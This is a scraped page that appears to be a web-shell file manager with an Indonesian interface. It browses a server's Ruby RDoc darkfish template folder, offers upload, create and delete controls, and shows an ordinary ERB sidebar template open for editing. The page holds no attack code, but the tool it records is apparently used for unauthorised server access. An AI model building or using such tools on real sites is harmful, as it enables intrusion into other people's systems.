PATH: //opt/alt/ruby26/lib64/ruby/2.6.0/rdoc/generator/template/darkfish
FILE_BARU
CREATE
FOLDER_BARU
MKDIR
UPLOAD_FILE
GO
[ .. KEMBALI ]
📄 _footer.rhtml
↓
X
📄 _head.rhtml
↓
X
📄 _sidebar_VCS_info.rhtml
↓
X
📄 _sidebar_classes.rhtml
↓
X
📄 _sidebar_extends.rhtml
↓
X
📄 _sidebar_in_files.rhtml
↓
X
📄 _sidebar_includes.rhtml
↓
X
📄 _sidebar_installed.rhtml
↓
X
📄 _sidebar_methods.rhtml
↓
X
📄 _sidebar_navigation.rhtml
↓
X
📄 _sidebar_pages.rhtml
↓
X
📄 _sidebar_parent.rhtml
↓
X
📄 _sidebar_search.rhtml
↓
X
📄 _sidebar_sections.rhtml
↓
X
📄 _sidebar_table_of_contents.rhtml
↓
X
📄 class.rhtml
↓
X
📁 css/
X
📁 fonts/
X
📁 images/
X
📄 index.rhtml
↓
X
📁 js/
X
📄 page.rhtml
↓
X
📄 servlet_not_found.rhtml
↓
X
📄 servlet_root.rhtml
↓
X
📄 table_of_contents.rhtml
↓
X
SAVING...
BERHASIL DIUBAH!
EDITING: _sidebar_table_of_contents.rhtml
<% comment = if current.respond_to? :comment_location then current.comment_location else current.comment end table = current.parse(comment).table_of_contents if table.length > 1 then %> <div class="nav-section"> <h3>Table of Contents</h3> <ul class="link-list" role="directory"> <% table.each do |heading| %> <li><a href="#<%= heading.label current %>"><%= heading.plain_html %></a> <% end %> </ul> </div> <% end %>
SIMPAN PERUBAHAN